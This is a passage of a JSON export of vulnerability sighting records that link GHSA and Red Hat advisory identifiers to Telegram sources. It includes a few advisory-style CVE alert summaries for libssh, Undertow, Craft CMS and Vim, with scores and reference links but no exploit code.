"Telegram/Wq2MikHHjaMT3QcZYic1EqOjYlzbZBeR3fuLUZ6lQSb49CA", "content": "", "creation_timestamp": "2026-04-04T01:18:49.000000Z"}, {"uuid": "e0a2b082-0a3f-4e1d-a2ff-4e935e9f453c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C54J-2VQW-WPWP", "type": "published-proof-of-concept", "source": "Telegram/MEpsfFR7A3mQ2dGKH0pRdtzvADr6R8o0dal6eRm_pMO8wsk", "content": "", "creation_timestamp": "2026-04-06T21:20:35.000000Z"}, {"uuid": "f55e4e31-cae2-453f-9961-039ddf0cdcf3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F2G3-HH2R-CWGC", "type": "published-proof-of-concept", "source": "Telegram/2EnXoILGVbego74Wp-yQgBLadCUgQoVCHSSN8NjOPP4QJIY", "content": "", "creation_timestamp": "2026-04-06T21:21:11.000000Z"}, {"uuid": "6f257d8c-aa84-4e4a-b026-52105d1124ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V59X-FVPJ-J22X", "type": "published-proof-of-concept", "source": "Telegram/2EnXoILGVbego74Wp-yQgBLadCUgQoVCHSSN8NjOPP4QJIY", "content": "", "creation_timestamp": "2026-04-06T21:21:11.000000Z"}, {"uuid": "fbf05150-becf-4e93-b7b1-365bf4e998ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H749-FXX7-PWPG", "type": "published-proof-of-concept", "source": "Telegram/viJYT7gg8S3gJ-1aMGboAArF-0q_OTu7PWcGdGBWd_FKwXc", "content": "", "creation_timestamp": "2026-04-09T01:27:18.000000Z"}, {"uuid": "522f3e9e-8dbc-434f-a873-a34a0e171934", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FJ6V-43R7-GCJM", "type": "published-proof-of-concept", "source": "Telegram/viJYT7gg8S3gJ-1aMGboAArF-0q_OTu7PWcGdGBWd_FKwXc", "content": "", "creation_timestamp": "2026-04-09T01:27:18.000000Z"}, {"uuid": "7a400892-bd65-46bf-8c5e-eed323ddaf9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2WJ4-F825-2H2F", "type": "published-proof-of-concept", "source": "Telegram/viJYT7gg8S3gJ-1aMGboAArF-0q_OTu7PWcGdGBWd_FKwXc", "content": "", "creation_timestamp": "2026-04-09T01:27:18.000000Z"}, {"uuid": "e8b75574-b2a1-4ded-8c71-178c5bff7736", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FPPJ-VCM3-W229", "type": "published-proof-of-concept", "source": "Telegram/_GblWBcVIPYIrXGBoPy7b__AM0O64UdRepvGT6caCd3l3fA", "content": "", "creation_timestamp": "2026-03-27T03:17:50.000000Z"}, {"uuid": "ab2e0cce-4875-4f18-a1ba-ea95c04dde4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6W95-QGC4-5JXF", "type": "seen", "source": "Telegram/hP7eImde7r4m7yMTuc_s6yRrjdEU7i69S7GlZXENsXqke8A", "content": "", "creation_timestamp": "2026-03-27T03:18:19.000000Z"}, {"uuid": "02999ac7-2471-4ba1-aa78-402f1b65444a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V959-CWQ9-7HR6", "type": "published-proof-of-concept", "source": "Telegram/0wjdVVOdHVRh-NR-AUdnOvX_Jcqqbi6lE8Vl80iGy2s6Zy0", "content": "", "creation_timestamp": "2026-04-06T19:29:29.000000Z"}, {"uuid": "32c22b7e-3e8d-4ca5-ac41-67324100a437", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V8X3-W674-55P5", "type": "published-proof-of-concept", "source": "Telegram/0wjdVVOdHVRh-NR-AUdnOvX_Jcqqbi6lE8Vl80iGy2s6Zy0", "content": "", "creation_timestamp": "2026-04-06T19:29:29.000000Z"}, {"uuid": "693b9c46-a857-4a5b-93b3-d2fd9a21be8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2504", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/4528", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6918\n\ud83d\udd25 CVSS Score: 3.6 (CVSS_V3)\n\ud83d\udd39 Description: A flaw was found in the libssh implements abstract layer for message digest (MD) operations implemented by different supported crypto backends. The return values from these were not properly checked, which could cause low-memory situations failures, NULL dereferences, crashes, or usage of the uninitialized memory as an input for the KDF. In this case, non-matching keys will result in decryption/integrity failures, terminating the connection.\n\ud83d\udccf Published: 2023-12-19T00:30:21Z\n\ud83d\udccf Modified: 2025-02-15T03:31:24Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2023-6918\n2. https://access.redhat.com/errata/RHSA-2024:2504\n3. https://access.redhat.com/errata/RHSA-2024:3233\n4. https://access.redhat.com/security/cve/CVE-2023-6918\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2254997\n6. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LZQVUHWVWRH73YBXUQJOD6CKHDQBU3DM\n7. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MKQRBF3DWMWPH36LBCOBUTSIZRTPEZXB\n8. https://security.netapp.com/advisory/ntap-20250214-0009\n9. https://www.libssh.org/2023/12/18/libssh-0-10-6-and-libssh-0-9-8-security-releases\n10. https://www.libssh.org/security/advisories/CVE-2023-6918.txt", "creation_timestamp": "2025-02-15T04:11:32.000000Z"}, {"uuid": "bb972345-9e76-479b-8d1c-04be659f2c82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1866", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5664", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1635\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. \n\nAt HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.\n\ud83d\udccf Published: 2024-02-19T21:23:14.496Z\n\ud83d\udccf Modified: 2025-02-27T10:40:09.662Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1674\n2. https://access.redhat.com/errata/RHSA-2024:1675\n3. https://access.redhat.com/errata/RHSA-2024:1676\n4. https://access.redhat.com/errata/RHSA-2024:1677\n5. https://access.redhat.com/errata/RHSA-2024:1860\n6. https://access.redhat.com/errata/RHSA-2024:1861\n7. https://access.redhat.com/errata/RHSA-2024:1862\n8. https://access.redhat.com/errata/RHSA-2024:1864\n9. https://access.redhat.com/errata/RHSA-2024:1866\n10. https://access.redhat.com/errata/RHSA-2024:3354\n11. https://access.redhat.com/security/cve/CVE-2024-1635\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2264928", "creation_timestamp": "2025-02-27T11:25:30.000000Z"}, {"uuid": "8b540fb0-9228-48b1-8dad-df3b1333128f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6326-W46W-PPJW", "type": "seen", "source": "Telegram/RmP7l-K41x9UoCBscD5W8eizA4yDJaP_JqAKKOeWwXNyu-8", "content": "", "creation_timestamp": "2026-04-06T19:29:44.000000Z"}, {"uuid": "e01dcde4-6ab3-4f70-8235-19b0ed6c3a69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9CQF-439C-J96R", "type": "seen", "source": "Telegram/RmP7l-K41x9UoCBscD5W8eizA4yDJaP_JqAKKOeWwXNyu-8", "content": "", "creation_timestamp": "2026-04-06T19:29:44.000000Z"}, {"uuid": "84a31a3d-afa8-4e36-97af-92fb29f658e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P6PF-2GRM-8257", "type": "seen", "source": "Telegram/RmP7l-K41x9UoCBscD5W8eizA4yDJaP_JqAKKOeWwXNyu-8", "content": "", "creation_timestamp": "2026-04-06T19:29:44.000000Z"}, {"uuid": "f291fc61-b0db-4b82-9d47-35d0bc62852c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2J4Q-6P52-4RHW", "type": "seen", "source": "Telegram/RmP7l-K41x9UoCBscD5W8eizA4yDJaP_JqAKKOeWwXNyu-8", "content": "", "creation_timestamp": "2026-04-06T19:29:44.000000Z"}, {"uuid": "88175202-45ab-4b11-8fd2-851283eecf05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JG96-P5P6-Q3CV", "type": "seen", "source": "Telegram/RmP7l-K41x9UoCBscD5W8eizA4yDJaP_JqAKKOeWwXNyu-8", "content": "", "creation_timestamp": "2026-04-06T19:29:44.000000Z"}, {"uuid": "a90dea7d-f6ca-4c9a-8ac4-fa05dd93f7fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MMM5-3G4X-QW39", "type": "seen", "source": "Telegram/3kkVms_lj1pOIg13wE1G-TkOn-GF7E-LtfSm5ZR30UKw8qQ", "content": "", "creation_timestamp": "2026-04-06T19:30:06.000000Z"}, {"uuid": "790426a3-5d58-4eb6-89fd-140304fc2aa1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9X7M-M8GV-PX2J", "type": "published-proof-of-concept", "source": "Telegram/2EnXoILGVbego74Wp-yQgBLadCUgQoVCHSSN8NjOPP4QJIY", "content": "", "creation_timestamp": "2026-04-06T21:21:11.000000Z"}, {"uuid": "66691bcd-d82a-4844-9c38-59776270af8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JW63-M86R-2JXC", "type": "published-proof-of-concept", "source": "Telegram/2EnXoILGVbego74Wp-yQgBLadCUgQoVCHSSN8NjOPP4QJIY", "content": "", "creation_timestamp": "2026-04-06T21:21:11.000000Z"}, {"uuid": "4c9c0da8-e0e9-4a4d-8698-3f39931e714c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-38HF-FQ8X-Q49R", "type": "published-proof-of-concept", "source": "Telegram/nmybyhyW9j--U7tziXdh4Y31RLU4faF2Hhhi6Dlcxk1tj2s", "content": "", "creation_timestamp": "2026-03-31T23:20:06.000000Z"}, {"uuid": "a6c20eb4-e7bc-4e22-98f4-8b7ff7d09cb0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7FH7-8XQM-3G88", "type": "published-proof-of-concept", "source": "Telegram/nmybyhyW9j--U7tziXdh4Y31RLU4faF2Hhhi6Dlcxk1tj2s", "content": "", "creation_timestamp": "2026-03-31T23:20:06.000000Z"}, {"uuid": "f887ae8a-0c95-47e8-ae7c-e54427a65cb0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q9WX-GGWQ-MCGH", "type": "published-proof-of-concept", "source": "Telegram/nmybyhyW9j--U7tziXdh4Y31RLU4faF2Hhhi6Dlcxk1tj2s", "content": "", "creation_timestamp": "2026-03-31T23:20:06.000000Z"}, {"uuid": "4d765715-ddea-4ef4-ad48-aa05b07dcdea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4JCG-JXPF-5VQ3", "type": "published-proof-of-concept", "source": "Telegram/_fnqeA0DSzUxsfUgrLtw39NRieZko7R6ZhEkNfy6t9mpSrc", "content": "", "creation_timestamp": "2026-03-31T23:20:32.000000Z"}, {"uuid": "b3085537-694c-4bba-9c50-b36858053f38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8645-P2V4-73R2", "type": "published-proof-of-concept", "source": "Telegram/hTc1CGAilGvt_cIrw7Y_9fLTCJckaNJlCFjMk0GQDrEipkE", "content": "", "creation_timestamp": "2026-04-02T13:16:24.000000Z"}, {"uuid": "724ba2d5-b1fd-4299-bd4c-b9e343640c82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V6X5-CG8R-VV6X", "type": "seen", "source": "Telegram/e54ga9nXMr6DQKQaz2LvLSMhQxTpsj-b4LBmwV1E43L1qeM", "content": "", "creation_timestamp": "2026-04-02T19:27:42.000000Z"}, {"uuid": "3f9e722b-fa46-457b-92f5-63617f064ea2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H5J9-CVRW-V5QH", "type": "seen", "source": "Telegram/e54ga9nXMr6DQKQaz2LvLSMhQxTpsj-b4LBmwV1E43L1qeM", "content": "", "creation_timestamp": "2026-04-02T19:27:42.000000Z"}, {"uuid": "e2386359-0f48-4a08-a09c-a139b54b7d6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-737V-MQG7-C878", "type": "seen", "source": "Telegram/3kkVms_lj1pOIg13wE1G-TkOn-GF7E-LtfSm5ZR30UKw8qQ", "content": "", "creation_timestamp": "2026-04-06T19:30:06.000000Z"}, {"uuid": "91024b95-38fd-4044-acb7-b319f4d91b4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7C58-G782-9J38", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14983", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46731\n\ud83d\udd25 CVSS Score: 7.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: Craft is a content management system. Versions of Craft CMS on the 4.x branch prior to 4.14.13 and on the 5.x branch prior to 5.6.16 contains a potential remote code execution vulnerability via Twig SSTI. One must have administrator access and `ALLOW_ADMIN_CHANGES` must be enabled for this to work. Users should update to the patched versions 4.14.13 or 5.6.15 to mitigate the issue.\n\ud83d\udccf Published: 2025-05-05T19:35:31.347Z\n\ud83d\udccf Modified: 2025-05-05T20:03:42.802Z\n\ud83d\udd17 References:\n1. https://github.com/craftcms/cms/security/advisories/GHSA-7c58-g782-9j38\n2. https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv\n3. https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production\n4. http://github.com/craftcms/cms/pull/17026", "creation_timestamp": "2025-05-05T20:20:11.000000Z"}, {"uuid": "00d4e304-504e-4fdf-99ac-b00b99e38685", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G58H-MVJW-F4HV", "type": "published-proof-of-concept", "source": "Telegram/2EnXoILGVbego74Wp-yQgBLadCUgQoVCHSSN8NjOPP4QJIY", "content": "", "creation_timestamp": "2026-04-06T21:21:11.000000Z"}, {"uuid": "00af31f1-b497-4aaa-84fe-674f5632474b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7GVF-3W72-P2PG", "type": "published-proof-of-concept", "source": "Telegram/n7-CfRBZpti5FMCVD-2y1YYy9tNH31Z3hrhUaHIR5SuRmfI", "content": "", "creation_timestamp": "2026-04-06T21:21:38.000000Z"}, {"uuid": "adbd776b-ed66-427e-bd83-bcf9bc68a10f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HV3W-M4G2-5X77", "type": "seen", "source": "Telegram/t7opZ3s7Nl85xZs745vJOFh0FG2Whznv9BGbk6FzHivbIC0", "content": "", "creation_timestamp": "2026-04-07T17:29:48.000000Z"}, {"uuid": "c5ec2775-aa90-4de4-8659-58d59045d13d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VFMQ-JRX3-WV3C", "type": "seen", "source": "Telegram/t7opZ3s7Nl85xZs745vJOFh0FG2Whznv9BGbk6FzHivbIC0", "content": "", "creation_timestamp": "2026-04-07T17:29:48.000000Z"}, {"uuid": "c6f22b5a-b96a-48bc-af3f-08610999fbe6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WXHV-W77Q-6QWP", "type": "seen", "source": "Telegram/t7opZ3s7Nl85xZs745vJOFh0FG2Whznv9BGbk6FzHivbIC0", "content": "", "creation_timestamp": "2026-04-07T17:29:48.000000Z"}, {"uuid": "df029881-6a0d-40e7-b3c8-a1d1eed5af11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CMCR-Q4JF-P6Q9", "type": "published-proof-of-concept", "source": "Telegram/PsCo_Al2rNCHfpa-IE94yjZNK4tjM6zifbqO0UkQOdEj8yI", "content": "", "creation_timestamp": "2026-04-07T21:22:30.000000Z"}, {"uuid": "14c8e96a-b0cb-414b-9a93-6db1c8548f9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5JXF-VMQR-5G82", "type": "published-proof-of-concept", "source": "Telegram/PsCo_Al2rNCHfpa-IE94yjZNK4tjM6zifbqO0UkQOdEj8yI", "content": "", "creation_timestamp": "2026-04-07T21:22:30.000000Z"}, {"uuid": "80b473d5-060f-4127-a94b-be54c5109f1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X8RX-789C-2PXQ", "type": "published-proof-of-concept", "source": "Telegram/PsCo_Al2rNCHfpa-IE94yjZNK4tjM6zifbqO0UkQOdEj8yI", "content": "", "creation_timestamp": "2026-04-07T21:22:30.000000Z"}, {"uuid": "278aaffe-f7a6-401d-9a02-92e4b4e10796", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4GX2-PC4F-WQ37", "type": "published-proof-of-concept", "source": "Telegram/PsCo_Al2rNCHfpa-IE94yjZNK4tjM6zifbqO0UkQOdEj8yI", "content": "", "creation_timestamp": "2026-04-07T21:22:30.000000Z"}, {"uuid": "6a7ed964-65fa-4c52-95f4-c0dafb0ba33b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V895-833R-8C45", "type": "published-proof-of-concept", "source": "Telegram/UCQVBQ1wk3sWuk0eQ1N0bHldnYCTUsbgi6Jx-voi5Wevn8w", "content": "", "creation_timestamp": "2026-04-07T23:20:49.000000Z"}, {"uuid": "d12ebe48-67db-4c97-8e36-23ebb69a8293", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7RHW-5MPV-GP4H", "type": "published-proof-of-concept", "source": "Telegram/UCQVBQ1wk3sWuk0eQ1N0bHldnYCTUsbgi6Jx-voi5Wevn8w", "content": "", "creation_timestamp": "2026-04-07T23:20:49.000000Z"}, {"uuid": "3a104dd5-8777-4641-bc50-e50d4b7b4969", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WFMF-8626-Q3R3", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14624", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27423\n\ud83d\udd25 CVSS Score: 7.1 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: Vim is an open source, command line text editor. Vim is distributed with the tar.vim plugin, that allows easy editing and viewing of (compressed or uncompressed) tar files. Starting with 9.1.0858, the tar.vim plugin uses the \":read\" ex command line to append below the cursor position, however the is not sanitized and is taken literally from the tar archive. This allows to execute shell commands via special crafted tar archives. Whether this really happens, depends on the shell being used ('shell' option, which is set using $SHELL). The issue has been fixed as of Vim patch v9.1.1164\n\ud83d\udccf Published: 2025-03-03T16:30:19.752Z\n\ud83d\udccf Modified: 2025-05-02T23:03:02.425Z\n\ud83d\udd17 References:\n1. https://github.com/vim/vim/security/advisories/GHSA-wfmf-8626-q3r3\n2. https://github.com/vim/vim/commit/129a8446d23cd9cb4445fcfea259cba5e0487d29\n3. https://github.com/vim/vim/commit/334a13bff78aa0ad206bc436885f63e3a0bab399", "creation_timestamp": "2025-05-02T23:17:18.000000Z"}, {"uuid": "b79e401e-d7d5-4165-9426-c8716594c561", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4MQ7-PVJG-XP2R", "type": "published-proof-of-concept", "source": "Telegram/Dv-WNIQSBfenZP-L8llbvWNomtb7L7cuRFseuDShUkzpu6g", "content": "", "creation_timestamp": "2026-03-26T19:26:19.000000Z"}, {"uuid": "a8eb9ab0-39d3-41ba-904e-c9cac1793604", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R9W3-57W2-GCH2", "type": "published-proof-of-concept", "source": "Telegram/Dv-WNIQSBfenZP-L8llbvWNomtb7L7cuRFseuDShUkzpu6g", "content": "", "creation_timestamp": "2026-03-26T19:26:19.000000Z"}, {"uuid": "ba8f5dd9-385e-4d2f-b4d7-ad4428a9a976", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9FFQ-6457-8958", "type": "seen", "source": "Telegram/KBYE9xcSrVJP8YR7PFbodeWC5j3Vs7cAXceOWA5Jtu74trY", "content": "", "creation_timestamp": "2026-03-26T23:20:15.000000Z"}, {"uuid": "0c6b50d9-e153-4b37-bc35-5fe82a93e237", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C2C7-RCM5-VVQJ", "type": "seen", "source": "Telegram/KBYE9xcSrVJP8YR7PFbodeWC5j3Vs7cAXceOWA5Jtu74trY", "content": "", "creation_timestamp": "2026-03-26T23:20:15.000000Z"}, {"uuid": "9d4a6399-3132-45ab-bc52-d21077da5a69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-453R-G2PG-CXXQ", "type": "seen", "source": "Telegram/67MCm8uvWkL1PFFVLqu-Ae9nhYuAfQmsKMFjCSOu4hiA4mc", "content": "", "creation_timestamp": "2026-03-27T01:18:53.000000Z"}, {"uuid": "d0fed0ff-2c7f-4f57-a2da-252e6e02bade", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-99HJ-44VG-HFCP", "type": "seen", "source": "Telegram/HCzuKY5MuLPsfo_EI5S3ks6iQFEX7xEFL0kHnLhrHZ36Sb0", "content": "", "creation_timestamp": "2026-03-27T21:22:34.000000Z"}, {"uuid": "ec25c99c-b3f8-47f9-8263-d0c3f97e72de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PM37-62G7-P768", "type": "seen", "source": "Telegram/HCzuKY5MuLPsfo_EI5S3ks6iQFEX7xEFL0kHnLhrHZ36Sb0", "content": "", "creation_timestamp": "2026-03-27T21:22:34.000000Z"}, {"uuid": "b75530f1-cecb-4ebf-b672-0d5dbbb14344", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-43V7-FP2V-68F6", "type": "seen", "source": "Telegram/HCzuKY5MuLPsfo_EI5S3ks6iQFEX7xEFL0kHnLhrHZ36Sb0", "content": "", "creation_timestamp": "2026-03-27T21:22:34.000000Z"}, {"uuid": "45504761-9f78-444e-a637-b7f52ef9a09c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XGV5-66WP-CH88", "type": "seen", "source": "Telegram/HCzuKY5MuLPsfo_EI5S3ks6iQFEX7xEFL0kHnLhrHZ36Sb0", "content": "", "creation_timestamp": "2026-03-27T21:22:34.000000Z"}, {"uuid": "a179b48a-d0ac-485e-bcc5-4213dff13b96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3843-RR4G-M8JQ", "type": "published-proof-of-concept", "source": "Telegram/GtEl0gL_3vlqQaCU7OfUhEkhd2JzglfpejZoGd3NHIPeYno", "content": "", "creation_timestamp": "2026-03-27T23:28:35.000000Z"}, {"uuid": "c1dddbe7-8709-4f07-acea-22e8040c25f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-58R7-4WR5-HFX8", "type": "published-proof-of-concept", "source": "Telegram/GtEl0gL_3vlqQaCU7OfUhEkhd2JzglfpejZoGd3NHIPeYno", "content": "", "creation_timestamp": "2026-03-27T23:28:35.000000Z"}, {"uuid": "add08488-a71f-4efd-aed4-ddb524f54f10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VPHC-468G-8RFP", "type": "published-proof-of-concept", "source": 